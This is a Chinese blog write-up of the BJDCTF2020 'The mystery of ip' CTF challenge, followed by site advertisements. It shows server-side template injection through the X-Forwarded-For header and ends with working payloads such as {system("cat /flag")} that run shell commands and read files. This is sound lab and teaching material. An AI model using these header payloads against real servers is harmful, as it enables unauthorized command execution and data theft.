[BJDCTF2020]The mystery of ip 1
[BJDCTF2020]The mystery of ip 1
打开实例,发现flag.php路径,访问显示自己当前的内网ip
hackerbar
添加xff
请求头,尝试ip伪造,成功回显
判断可能为xff注入,尝试sql的部分注入语句均无效,放弃sql注入,尝试SSTI模板注入
X-Forwarded-For: {1+1}
成功回显,存在XFF-SSTI模板注入漏洞
尝试构造payload
X-Forwarded-For: {system("ls")}
成功遍历目录
查看flag.php,未发现flag
查看根目录
X-Forwarded-For: {system("ls / -a")}
发现flag,最终payload为:
X-Forwarded-For: {system("cat /flag")}
flag{b0a840de-eeaf-4ed1-80c1-bb12ff2bcb10}
本文来自博客园,作者:TazmiDev,转载请注明原文链接:https://www.cnblogs.com/tazmi/p/18565457
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek “源神”启动!「GitHub 热点速览」
· 我与微信审核的“相爱相杀”看个人小程序副业
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· C# 集成 DeepSeek 模型实现 AI 私有化(本地部署与 API 调用教程)
· spring官宣接入deepseek,真的太香了~